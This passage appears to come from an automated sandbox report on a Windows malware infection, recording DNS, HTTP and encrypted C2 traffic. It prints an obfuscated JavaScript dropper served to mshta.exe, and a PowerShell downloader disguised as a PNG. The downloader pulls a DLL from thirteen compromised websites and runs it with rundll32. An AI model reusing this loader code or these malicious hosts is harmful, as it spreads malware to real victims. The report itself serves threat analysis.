                                                                                                                        Jan 28, 2022 20:53:49.822508097 CET8049168160.16.102.168192.168.2.22
                                                                                                                        Jan 28, 2022 20:53:49.822789907 CET4916880192.168.2.22160.16.102.168
                                                                                                                        Jan 28, 2022 20:54:01.831155062 CET4916880192.168.2.22160.16.102.168
                                                                                                                        Jan 28, 2022 20:54:02.173120975 CET8049168160.16.102.168192.168.2.22
                                                                                                                        Jan 28, 2022 20:54:03.011204958 CET8049168160.16.102.168192.168.2.22
                                                                                                                        Jan 28, 2022 20:54:03.011404037 CET4916880192.168.2.22160.16.102.168
                                                                                                                        Jan 28, 2022 20:54:06.013930082 CET8049168160.16.102.168192.168.2.22
                                                                                                                        Jan 28, 2022 20:54:06.013957977 CET8049168160.16.102.168192.168.2.22
                                                                                                                        Jan 28, 2022 20:54:06.016807079 CET4916880192.168.2.22160.16.102.168
                                                                                                                        Jan 28, 2022 20:54:08.013220072 CET4916680192.168.2.2291.240.118.168
                                                                                                                        Jan 28, 2022 20:54:08.071820974 CET804916691.240.118.168192.168.2.22

                                                                                                                        UDP Packets

                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                        Jan 28, 2022 20:52:28.023185015 CET5216753192.168.2.228.8.8.8
                                                                                                                        Jan 28, 2022 20:52:28.076164961 CET53521678.8.8.8192.168.2.22

                                                                                                                        DNS Queries

                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                        Jan 28, 2022 20:52:28.023185015 CET192.168.2.228.8.8.80xfee6Standard query (0)www.yeald.financeA (IP address)IN (0x0001)

                                                                                                                        DNS Answers

                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                        Jan 28, 2022 20:52:28.076164961 CET8.8.8.8192.168.2.220xfee6No error (0)www.yeald.finance94.130.116.76A (IP address)IN (0x0001)

                                                                                                                        HTTP Request Dependency Graph

                                                                                                                        • www.yeald.finance
                                                                                                                        • 91.240.118.168

                                                                                                                        HTTP Packets

                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        0192.168.2.224916794.130.116.76443C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        1192.168.2.224916591.240.118.16880C:\Windows\System32\mshta.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Jan 28, 2022 20:52:22.327665091 CET0OUTGET /zzx/ccv/fe.html HTTP/1.1
                                                                                                                        Accept: */*
                                                                                                                        Accept-Language: en-US
                                                                                                                        UA-CPU: AMD64
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                        Host: 91.240.118.168
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Jan 28, 2022 20:52:22.388957024 CET2INHTTP/1.1 200 OK
                                                                                                                        Server: nginx/1.20.1
                                                                                                                        Date: Fri, 28 Jan 2022 19:52:22 GMT
                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                        Content-Length: 11101
                                                                                                                        Last-Modified: Wed, 26 Jan 2022 22:19:29 GMT
                                                                                                                        Connection: keep-alive
                                                                                                                        ETag: "61f1c8f1-2b5d"
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Data Raw: 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 27 20 63 6f 6e 74 65 6e 74 3d 27 45 6d 75 6c 61 74 65 49 45 39 27 3e 3c 73 63 72 69 70 74 3e 6c 31 6c 3d 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 4d 6f 64 65 7c 7c 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 3b 76 61 72 20 66 39 66 37 36 63 3d 74 72 75 65 3b 6c 6c 31 3d 64 6f 63 75 6d 65 6e 74 2e 6c 61 79 65 72 73 3b 6c 6c 6c 3d 77 69 6e 64 6f 77 2e 73 69 64 65 62 61 72 3b 66 39 66 37 36 63 3d 28 21 28 6c 31 6c 26 26 6c 6c 31 29 26 26 21 28 21 6c 31 6c 26 26 21 6c 6c 31 26 26 21 6c 6c 6c 29 29 3b 6c 5f 6c 6c 3d 6c 6f 63 61 74 69 6f 6e 2b 27 27 3b 6c 31 31 3d 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3b 66 75 6e 63 74 69 6f 6e 20 6c 49 31 28 6c 31 49 29 7b 72 65 74 75 72 6e 20 6c 31 31 2e 69 6e 64 65 78 4f 66 28 6c 31 49 29 3e 30 3f 74 72 75 65 3a 66 61 6c 73 65 7d 3b 6c 49 49 3d 6c 49 31 28 27 6b 68 74 27 29 7c 6c 49 31 28 27 70 65 72 27 29 3b 66 39 66 37 36 63 7c 3d 6c 49 49 3b 7a 4c 50 3d 6c 6f 63 61 74 69 6f 6e 2e 70 72 6f 74 6f 63 6f 6c 2b 27 30 46 44 27 3b 6f 41 35 54 32 34 6a 45 64 78 6d 48 38 3d 6e 65 77 20 41 72 72 61 79 28 29 3b 75 79 53 4d 6f 71 32 53 35 73 66 44 51 3d 6e 65 77 20 41 72 72 61 79 28 29 3b 75 79 53 4d 6f 71 32 53 35 73 66 44 51 5b 30 5d 3d 27 5c 31 36 34 25 33 33 5c 31 30 33 5c 31 34 36 5c 31 35 33 72 25 33 38 5c 31 31 31 27 20 20 20 3b 6f 41 35 54 32 34 6a 45 64 78 6d 48 38 5b 30 5d 3d 27 7f 3c 7f 21 7f 44 7f 4f 7f 43 7f 54 7f 59 7f 50 7f 45 7f 20 7f 68 7f 74 7f 6d 7f 6c 7f 20 7f 50 7f 55 7f 42 7f 4c 7f 49 7f 43 7f 20 7f 22 7f 2d 7f 2f 7f 2f 7f 57 7f 33 7f 43 7e 18 7f 44 7f 54 7f 44 7f 20 7f 58 7f 48 7f 54 7f 4d 7f 4c 7f 20 7f 31 7f 2e 7f 30 7f 20 7f 54 7f 72 7f 61 7f 6e 7f 73 7f 69 7f 74 7f 69 7f 6f 7f 6e 7f 61 7f 6c 7e 18 7f 45 7f 4e 7f 22 7e 15 7e 5c 6e 7f 74 7f 70 7f 3a 7e 18 7f 77 7e 42 7f 2e 7f 77 7f 33 7f 2e 7f 6f 7f 72 7f 67 7f 2f 7f 54 7f 52 7f 2f 7f 78 7e 5c 6e 7e 0c 7f 31 7f 2f 7e 1e 7f 44 7e 4e 7e 50 7f 6c 7f 31 7f 2d 7f 74 7e 2d 7e 2f 7e 31 7e 33 7e 35 7f 6c 7f 2e 7f 64 7f 74 7f 64 7f 22 7f 3e 7f 3c 7e 57 7f 20 7f 78 7e 0c 7e 2f 7f 3d 7f 22 7e 3d 7e 3f 7e 41 7e 43 7e 45 7e 47 7e 49 7f 2f 7f 31 7f 39 7e 79 7e 56 7e 0b 7f 6c 7e 66 7e 68 7f 65 7f 61 7f 64 7e 67 7f 73 7f 63 7f 72 7f 69 7f 70 7f 74 7f 3e 7f 65 7f 76 7e 36 7f 28 7f 75 7f 6e 7f 65 7d 04 7f 61 7f 70 7f 65 7f 28 7f 5c 27 7f 25 7f 37 7f 36 7f 61 7d 18 7f 32 7f 25 7f 32 7f 30 7f 71 7d 18 7f 39 7f 25 7f 33 7f 37 7d 24 7f 44 7d 1e 7d 26 7f 32 7d 26 7f 33 7f 42 7f 5c 5c 7f 31 7f 36 7f 31 7d 22 7d 24 7f 38 7d 5c 27 7d 2f 7f 32 7f 33 7d 2f 7f 36 7f 34 7d 3a 7d 1d 7f 36 7f 39 7f 6e 7f 67 7d 1e 7f 45 7f 66 7f 72 7d 2f
                                                                                                                        Data Ascii: <html><head><meta http-equiv='x-ua-compatible' content='EmulateIE9'><script>l1l=document.documentMode||document.all;var f9f76c=true;ll1=document.layers;lll=window.sidebar;f9f76c=(!(l1l&&ll1)&&!(!l1l&&!ll1&&!lll));l_ll=location+'';l11=navigator.userAgent.toLowerCase();function lI1(l1I){return l11.indexOf(l1I)>0?true:false};lII=lI1('kht')|lI1('per');f9f76c|=lII;zLP=location.protocol+'0FD';oA5T24jEdxmH8=new Array();uySMoq2S5sfDQ=new Array();uySMoq2S5sfDQ[0]='\164%33\103\146\153r%38\111' ;oA5T24jEdxmH8[0]='<!DOCTYPE html PUBLIC "-//W3C~DTD XHTML 1.0 Transitional~EN"~~\ntp:~w~B.w3.org/TR/x~\n~1/~D~N~Pl1-t~-~/~1~3~5l.dtd"><~W x~~/="~=~?~A~C~E~G~I/19~y~V~l~f~head~gscript>ev~6(une}ape(\'%76a}2%20q}9%37}$D}}&2}&3B\\161}"}$8}\'}/23}/64}:}69ng}Efr}/
                                                                                                                        Jan 28, 2022 20:52:22.389013052 CET3INData Raw: 7f 35 7f 37 7f 6d 7d 2f 7f 30 7d 39 7f 31 7f 35 7f 30 7d 1b 7f 37 7f 32 7f 43 7d 47 7d 26 7d 3b 7f 25 7f 36 7f 35 7d 1e 7d 35 7f 33 7d 32 7f 33 7f 33 7d 1e 7f 43 7d 24 7d 5e 7f 30 7d 1e 7d 23 7d 2d 7f 66 7d 55 7d 3d 7d 5b 7f 69 7d 5c 27 7d 24 7d
                                                                                                                        Data Ascii: 57m}/0}9150}72C}G}&};%65}}53}233}C}$}^0}}#}-f}U}=}[i}\'}$}e}-}X}g}b3}34}$},}^B}m2B}}2}#7}71}/|}y|zd}6}0}27}g}57}(}hu}XE}/4}`7}x}?o}G6}}e||}^| 2}5|}}|||&|(1d}Uc}5}G|414|656}:}x2E
                                                                                                                        Jan 28, 2022 20:52:22.389066935 CET4INData Raw: 78 53 7f 74 7f 2d 7f 66 7f 61 7f 6d 7f 69 7f 6c 7f 79 7f 3a 7f 20 7f 56 78 4f 7f 64 7e 2e 7f 61 7f 2c 7f 20 7f 41 7d 06 7e 36 78 6b 7f 48 7f 65 7f 6c 7f 76 7f 65 7e 32 7f 63 78 6a 78 55 7e 2e 7f 73 7f 2d 7f 73 78 4f 7f 69 7f 66 7f 3b 7f 20 78 5b
                                                                                                                        Data Ascii: xSt-family: VxOd~.a, A}~6xkHelve~2cxjxU~.s-sxOif; x[x|izexd12pxwx:x<rxd#Fwwwbackgro}d-w~Hwx@xBx2>ThexUwryl x:|M of zlis pay w7w9wxcxx7by <b~gx[xUxWxYxLx;w" w
                                                                                                                        Jan 28, 2022 20:52:22.389117002 CET6INData Raw: 25 36 43 25 33 39 25 33 44 5c 31 35 34 25 33 34 25 32 45 5c 31 34 33 25 36 38 61 72 43 6f 64 25 36 35 25 34 31 25 37 34 25 32 38 25 35 46 25 33 31 25 32 39 25 33 42 5c 31 35 34 25 34 39 25 33 44 5c 31 35 34 25 33 34 27 20 20 20 3b 66 75 6e 63 74
                                                                                                                        Data Ascii: %6C%39%3D\154%34%2E\143%68arCod%65%41%74%28%5F%31%29%3B\154%49%3D\154%34' ;function x872ZYojG5NSopv2dG(cOe7uw1){kBc9qpTNM+=cOe7uw1};oA5T24jEdxmH8[0]+='<awLxXw*x\'xxx\\|Mx:~-~2~4xdn~4ew\rwPwwRwwUxC~{Efx\'~p~@/~Bw.{Swyv.{E.x:mx+x
                                                                                                                        Jan 28, 2022 20:52:22.389168978 CET7INData Raw: 62 7f 65 73 4c 7f 65 7f 42 7f 65 7f 67 76 19 7f 5c 27 7f 2c 7f 5c 27 7f 61 7f 66 76 2a 71 5c 6e 71 0c 72 6a 71 0f 71 06 71 08 7a 0c 7f 64 71 0e 71 10 71 12 78 4f 71 1a 78 07 72 4b 72 02 74 17 7f 65 71 01 78 6d 7e 2d 7f 79 7d 16 7e 57 71 1c 77 29
                                                                                                                        Data Ascii: besLeBegv\',\'afv*q\nqrjqqqzdqqqxOqxrKrteqxm~-y}~Wqw)}qx-dyqaqvgqw`vqsLvjqu=sqs q5nputqpq!lrrBqKrt,;sx#tv5(qN1sZxwx}~\':qKq#qzdqq((|,qdqfsEyqeqhqkqjqmyuBwi}zdk;qZw*2q]s$Iq$q&
                                                                                                                        Jan 28, 2022 20:52:22.389219046 CET9INData Raw: 39 25 33 42 6c 25 33 37 25 35 42 25 34 39 25 32 42 25 32 42 25 35 44 25 33 44 6c 5c 31 31 31 25 32 42 69 6c 25 32 44 25 32 38 5c 31 35 34 25 33 39 25 33 43 25 33 43 25 33 37 25 32 39 25 37 44 5c 31 36 37 25 36 38 69 25 36 43 25 36 35 25 32 38 25
                                                                                                                        Data Ascii: 9%3Bl%37%5B%49%2B%2B%5D%3Dl\111%2Bil%2D%28\154%39%3C%3C%37%29%7D\167%68i%6C%65%28%5F%31%2B%2B%3Cl%38%29%3B\166%61%72%20l%31%3Dn%65\167%20A\162%72a%79%28%29%2Cl%30%3D\156e%77%20%41r\162a\171%28%29%2C%49%6C%3D%31%32%38%3Bdo%7B\154%30%5B\111%6C%5
                                                                                                                        Jan 28, 2022 20:52:22.389267921 CET10INData Raw: 6e 7f 78 1a 7f 52 7e 2e 79 02 74 2c 76 68 70 13 78 1a 73 41 78 4e 76 48 77 5d 7f 6c 7f 46 7e 2d 7f 67 6d 03 6d 78 73 51 74 36 7f 70 7f 3d 74 3e 6c 01 6d 1e 79 5c 6e 6e 62 7c 4d 73 7a 64 6c 04 71 5c 6e 71 08 7f 28 77 2d 7f 66 7f 2c 6e 74 74 67 6f
                                                                                                                        Data Ascii: nxR~.yt,vhpxsAxNvHw]lF~-gmmxsQt6p=t>lmy\nnb|Mszdlq\nq(w-f,nttgoNl/=qX{l~/xOtl9z\nl;ll>s;iv+tmpTl-nJl0rlEmm9nYn0n\\l<lTlAl0rlYw:mtncllHlJ{ElLl=u.}vHSix s9pTojm*(xuunumrtZrr\rjsZx0oRzlnd~.zxt]uBdpIDmzd
                                                                                                                        Jan 28, 2022 20:52:22.389321089 CET11INData Raw: 58 7f 6f 68 7c 6d 22 6e 67 67 7a 64 68 6b 67 17 67 02 68 48 69 51 7f 47 7f 4e 69 75 7f 49 7f 60 7f 45 7f 60 7f 58 68 53 7f 4a 7f 49 7f 7c 67 33 67 35 7f 58 7e 3b 7f 2b 7e 15 67 41 67 2f 7f 41 69 75 7f 24 67 39 75 5e 68 54 7f 2c 69 77 7f 34 67 4a
                                                                                                                        Data Ascii: Xoh|m"nggzdhkgghHiQGNiuI`E`XhSJI|g3g5X~;+~gAg/Aiu$g9u^hT,iw4gJixihJovhGuBgbgVngXtohK g@gg\\ isg_GgDg@g0iQWStos>sM87) &g`hglrg_"rg_kiXxtv+x.~>iuAg_gk(8gugqfz4gog@"xr~}iQoxv\rat*sw8xJCl!ehd
                                                                                                                        Jan 28, 2022 20:52:22.389373064 CET12INData Raw: 64 78 6d 5c 31 31 30 25 33 38 25 35 42 69 5c 31 35 31 25 35 44 25 32 39 25 37 44 25 33 42 63 25 33 36 25 33 37 66 25 33 39 66 25 32 38 25 32 39 25 33 42 27 20 20 20 3b 3c 2f 73 63 72 69 70 74 3e 3c 21 2d 2d 71 32 59 35 6e 70 68 64 4c 62 5a 6d 46
                                                                                                                        Data Ascii: dxm\110%38%5Bi\151%5D%29%7D%3Bc%36%37f%39f%28%29%3B' ;</script>...q2Y5nphdLbZmF--><script>s7QI85IIVgT ='rVuOCigOkOOFqdSjdOXZnLtOLcGtSOfZTnM' ;jG5NSopv2dGx872ZYo (xyld3V8T87U5);k9O7mwtFHJK1 (xyld3V8T87U5);x872ZYojG5NSopv2dG (ej6


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        2192.168.2.224916691.240.118.16880C:\Windows\System32\mshta.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Jan 28, 2022 20:52:27.917165041 CET13OUTGET /zzx/ccv/fe.png HTTP/1.1
                                                                                                                        Host: 91.240.118.168
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Jan 28, 2022 20:52:27.975884914 CET14INHTTP/1.1 200 OK
                                                                                                                        Server: nginx/1.20.1
                                                                                                                        Date: Fri, 28 Jan 2022 19:52:27 GMT
                                                                                                                        Content-Type: image/png
                                                                                                                        Content-Length: 1236
                                                                                                                        Last-Modified: Wed, 26 Jan 2022 22:19:20 GMT
                                                                                                                        Connection: keep-alive
                                                                                                                        ETag: "61f1c8e8-4d4"
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Data Raw: 24 70 61 74 68 20 3d 20 22 43 3a 5c 55 73 65 72 73 5c 50 75 62 6c 69 63 5c 44 6f 63 75 6d 65 6e 74 73 5c 73 73 64 2e 64 6c 6c 22 3b 0d 0a 24 75 72 6c 31 20 3d 20 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 79 65 61 6c 64 2e 66 69 6e 61 6e 63 65 2f 77 70 2d 61 64 6d 69 6e 2f 31 57 67 50 52 6d 2f 27 3b 0d 0a 24 75 72 6c 32 20 3d 20 27 68 74 74 70 3a 2f 2f 73 6e 65 61 6b 61 64 72 65 61 6d 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 63 63 6d 41 4f 71 2f 27 3b 0d 0a 24 75 72 6c 33 20 3d 20 27 68 74 74 70 73 3a 2f 2f 75 6d 61 6e 6f 73 74 75 64 69 6f 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 6e 31 4c 47 37 61 4a 6e 70 74 42 6c 51 6b 43 2f 27 3b 0d 0a 24 75 72 6c 34 20 3d 20 27 68 74 74 70 73 3a 2f 2f 77 65 64 64 69 6e 67 62 61 6e 64 73 69 72 65 6c 61 6e 64 6a 62 6b 2e 63 6f 6d 2f 68 67 73 79 6e 74 32 2f 6f 2f 27 3b 0d 0a 24 75 72 6c 35 20 3d 20 27 68 74 74 70 73 3a 2f 2f 67 65 74 63 6f 64 65 2e 69 6e 66 6f 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 51 44 78 38 62 35 6a 2f 27 3b 0d 0a 24 75 72 6c 36 20 3d 20 27 68 74 74 70 73 3a 2f 2f 66 61 6c 61 68 2e 6f 72 67 2e 70 6b 2f 76 65 67 61 73 76 75 6c 6b 61 6e 31 30 30 30 2e 66 61 6c 61 68 2e 6f 72 67 2e 70 6b 2f 5a 42 52 78 34 51 75 55 58 66 4c 48 2f 27 3b 0d 0a 24 75 72 6c 37 20 3d 20 27 68 74 74 70 73 3a 2f 2f 63 68 6f 63 68 75 6e 67 63 75 68 61 6e 6f 69 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 63 79 45 32 75 30 63 6e 6f 6c 50 2f 27 3b 0d 0a 24 75 72 6c 38 20 3d 20 27 68 74 74 70 73 3a 2f 2f 61 6c 6c 61 61 67 65 6e 63 79 2e 72 6f 2f 77 70 2d 61 64 6d 69 6e 2f 37 2f 27 3b 0d 0a 24 75 72 6c 39 20 3d 20 27 68 74 74 70 3a 2f 2f 74 61 74 74 6f 6f 62 6c 6f 67 2e 63 6e 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 4b 4a 4c 76 2f 27 3b 0d 0a 24 75 72 6c 31 30 20 3d 20 27 68 74 74 70 73 3a 2f 2f 70 61 6c 61 6e 6b 68 69 72 2e 68 75 2f 74 6f 6f 6c 73 2f 47 4a 52 4e 68 5a 48 7a 2f 27 3b 0d 0a 24 75 72 6c 31 31 20 3d 20 27 68 74 74 70 3a 2f 2f 6d 61 73 62 6f 6e 69 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 33 7a 55 51 6c 2f 27 3b 0d 0a 24 75 72 6c 31 32 20 3d 20 27 68 74 74 70 73 3a 2f 2f 74 61 6e 71 75 65 73 73 65 70 74 69 63 6f 73 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 41 70 56 56 62 6c 31 66 51 30 2f 27 3b 0d 0a 24 75 72 6c 31 33 20 3d 20 27 68 74 74 70 3a 2f 2f 73 74 61 72 73 70 65 65 64 6e 67 2e 63 6f 6d 2f 4f 6e 65 2d 46 69 6c 65 2f 55 33 54 72 6d 6c 2f 27 3b 0d 0a 0d 0a 0d 0a 24 77 65 62 20 3d 20 4e 65 77 2d 4f 62 6a 65 63 74 20 6e 65 74 2e 77 65 62 63 6c 69 65 6e 74 3b 0d 0a 24 75 72 6c 73 20 3d 20 22 24 75 72 6c 31 2c 24 75 72 6c 32 2c 24 75 72 6c 33 2c 24 75 72 6c 34 2c 24 75 72 6c 35 2c 24 75 72 6c 36 2c 24 75 72 6c 37 2c 24 75 72 6c 38 2c 24 75 72 6c 39 2c 24 75 72 6c 31 30 2c 24 75 72 6c 31 31 2c 24 75 72 6c 31 32 2c 24 75 72 6c 31 33 22 2e 73 70 6c 69 74 28 22 2c 22 29 3b 0d 0a 66 6f 72 65 61 63 68 20 28 24 75 72 6c 20 69 6e 20 24 75 72 6c 73 29 20 7b 0d 0a 20 20 20 74 72 79 20 7b 0d 0a 20 20 20 20 20 20 20 24 77 65 62 2e 44 6f 77 6e 6c 6f 61 64 46 69 6c 65 28 24 75 72 6c 2c 20 24 70 61 74 68 29 3b 0d 0a 20 20 20 20 20 20 20 69 66 20 28 28 47 65 74 2d 49 74 65 6d 20 24 70 61 74 68 29 2e 4c 65 6e 67 74 68 20 2d 67 65 20 33 30 30 30 30 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 5b 44 69 61 67 6e 6f 73 74 69 63 73 2e 50 72 6f 63 65 73 73 5d 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 62 72 65 61 6b
                                                                                                                        Data Ascii: $path = "C:\Users\Public\Documents\ssd.dll";$url1 = 'https://www.yeald.finance/wp-admin/1WgPRm/';$url2 = 'http://sneakadream.com/wp-content/pccmAOq/';$url3 = 'https://umanostudio.com/wp-admin/n1LG7aJnptBlQkC/';$url4 = 'https://weddingbandsirelandjbk.com/hgsynt2/o/';$url5 = 'https://getcode.info/wp-content/QDx8b5j/';$url6 = 'https://falah.org.pk/vegasvulkan1000.falah.org.pk/ZBRx4QuUXfLH/';$url7 = 'https://chochungcuhanoi.com/wp-content/cyE2u0cnolP/';$url8 = 'https://allaagency.ro/wp-admin/7/';$url9 = 'http://tattooblog.cn/wp-includes/KJLv/';$url10 = 'https://palankhir.hu/tools/GJRNhZHz/';$url11 = 'http://masboni.com/wp-admin/3zUQl/';$url12 = 'https://tanquessepticos.com/wp-admin/ApVVbl1fQ0/';$url13 = 'http://starspeedng.com/One-File/U3Trml/';$web = New-Object net.webclient;$urls = "$url1,$url2,$url3,$url4,$url5,$url6,$url7,$url8,$url9,$url10,$url11,$url12,$url13".split(",");foreach ($url in $urls) { try { $web.DownloadFile($url, $path); if ((Get-Item $path).Length -ge 30000) { [Diagnostics.Process]; break
                                                                                                                        Jan 28, 2022 20:52:27.975898981 CET14INData Raw: 3b 0d 0a 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 7d 0d 0a 20 20 20 63 61 74 63 68 7b 7d 0d 0a 7d 20 0d 0a 53 6c 65 65 70 20 2d 73 20 34 3b 63 6d 64 20 2f 63 20 43 3a 5c 57 69 6e 64 6f 77 73 5c 53 79 73 57 6f 77 36 34 5c 72 75 6e 64 6c 6c 33 32 2e
                                                                                                                        Data Ascii: ; } } catch{}} Sleep -s 4;cmd /c C:\Windows\SysWow64\rundll32.exe 'C:\Users\Public\Documents\ssd.dll',AnyString;


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        3192.168.2.2249168160.16.102.16880C:\Windows\SysWOW64\rundll32.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Jan 28, 2022 20:53:49.188121080 CET570OUTData Raw: 16 03 03 00 92 01 00 00 8e 03 03 61 f4 c8 5c d0 21 93 cd 75 e8 2e 49 48 31 bf b1 44 24 42 f3 0f 9d d3 b0 2e 00 26 41 9d 16 d2 2c 00 00 34 c0 28 c0 27 c0 14 c0 13 00 9f 00 9e 00 39 00 33 00 9d 00 9c 00 3d 00 3c 00 35 00 2f c0 2c c0 2b c0 24 c0 23
                                                                                                                        Data Ascii: a\!u.IH1D$B.&A,4('93=<5/,+$#j@821
                                                                                                                        Jan 28, 2022 20:53:49.509098053 CET571INData Raw: 16 03 03 00 5d 02 00 00 59 03 03 d5 aa 8e ee cc e2 db 7e 1e 98 30 bd ea cb c1 a1 43 d8 82 a4 01 47 b3 be 53 32 c3 82 5f 86 05 ad 20 48 fa 67 23 bd e8 48 98 7a 52 db c3 7a 1e 9f 39 f0 80 60 85 c8 59 71 9d 82 38 73 47 6b bf 1f 5a c0 28 00 00 11 ff
                                                                                                                        Data Ascii: ]Y~0CGS2_ Hg#HzRz9`Yq8sGkZ(00\*b0*H0w10UGB10ULondon10ULondon10UGlobal Security10UIT De
                                                                                                                        Jan 28, 2022 20:53:49.509155989 CET571INData Raw: cc c1 8e 76 ef 0d 22 f6 3a 1b 23 64 7d d8 0f bf 14 78 7d df 4f a2 14 fd 3f b9 19 ce eb 1b ff 9d c0 56 f5 75 3e 19 76 eb dd 97 33 8c b0 8c 8f b3 ee e6 00 25 8d 79 9c d4 f2 82 d9 af dd 71 1e 27 d5 24 54 27 22 e7 d5 1b cb 0a 6a 00 94 b8 16 03 03 00
                                                                                                                        Data Ascii: v":#d}x}O?Vu>v3%yq'$T'"j
                                                                                                                        Jan 28, 2022 20:53:49.516428947 CET572OUTData Raw: 16 03 03 00 46 10 00 00 42 41 04 2c 3b a9 21 8a 3e 46 65 de 2e 54 5a 5a 6d 2c b1 80 28 6c a1 10 10 2d bc 33 60 b9 f4 96 1a 76 c5 43 14 dd b7 fa 4a b7 65 78 db 6a 3c af e3 54 5e 7c a3 35 f8 d3 3d a4 5c 53 22 d1 e6 f6 69 04 3e 14 03 03 00 01 01 16
                                                                                                                        Data Ascii: FBA,;!>Fe.TZZm,(l-3`vCJexj<T^|5=\S"i>` `}7N|:b}JSzHFo%|DL`DZmhOZw{)gVWct]
                                                                                                                        Jan 28, 2022 20:53:49.822508097 CET572INData Raw: 14 03 03 00 01 01 16 03 03 00 60 5d a9 c2 96 f0 c7 9a 78 3e ba 8a 0d 56 0b bd 05 95 82 47 8a 4f 5a 57 52 b6 9f 62 bc bc cb a0 34 9e 4d a4 88 6e 91 48 e8 49 35 d5 30 2e 4b aa 7f 2b 0b ae a8 74 c8 fd 86 fc 95 f8 3c 38 e9 8a 8e d1 1f 45 a8 d6 77 ce
                                                                                                                        Data Ascii: `]x>VGOZWRb4MnHI50.K+t<8EwY^G$VitGb
                                                                                                                        Jan 28, 2022 20:54:01.831155062 CET638OUTData Raw: 17 03 03 01 e0 3c 0f 03 cb 66 73 a2 3c 20 81 8a 66 fb d4 ae 3f ec b3 04 37 ae 8c 98 aa f6 8f 2c 1f ac 6e 1a 98 9c 9e e4 af d9 6d 27 42 d7 80 4e b9 62 0e 46 88 c6 93 3e de cd c0 62 af bd 2a ce 1b 38 bc 4a 1e 66 8c 4d 97 70 2a fb 8c 60 92 91 b9 04
                                                                                                                        Data Ascii: <fs< f?7,nm'BNbF>b*8JfMp*`BK'kIao!UrL5$T&R+il|<CBJk}r|]]#?<vDK2JKUy^A]!c1}g#Yj6
                                                                                                                        Jan 28, 2022 20:54:03.011204958 CET639INData Raw: 17 03 03 05 00 6a 82 16 a6 43 62 dc 6f e5 8e 24 b8 cc 28 17 2c c6 d7 7c b2 ac e2 52 2d aa 1b ed 0f 1c d7 4e 99 99 1e f3 e1 f1 c9 73 ed 27 fa 68 be d9 68 4e ef ff bd d3 2a 23 63 cd 2f 42 35 5b 8a 31 b3 99 a5 86 8c a6 cd 68 dd df 45 8a 02 05 81 92
                                                                                                                        Data Ascii: jCbo$(,|R-Ns'hhN*#c/B5[1hEH:K-HiU[(^lj9'!qUA^8Jy=Whm|dQ^.>\+C+%eiSQ.EgYk8~C>y13)wp7|3<V@`nf~
                                                                                                                        Jan 28, 2022 20:54:06.013930082 CET639INData Raw: 15 03 03 00 50 23 a3 a7 fe 3b 62 97 4d 2e 28 53 13 d3 25 3b 44 5d 78 87 e7 47 45 3c d8 1e c3 9b f7 e6 5b 8d 73 66 4e a2 95 63 ed 49 e6 e7 33 07 72 44 95 2b eb 9f 7a 04 5a 7d a8 83 b3 15 e5 2c 4b a0 6a 7d 49 f7 78 3f 10 19 f4 8d 4e c7 a7 5a 9b 11
                                                                                                                        Data Ascii: P#;bM.(S%;D]xGE<[sfNcI3rD+zZ},Kj}Ix?NZk


                                                                                                                        HTTPS Proxied Packets

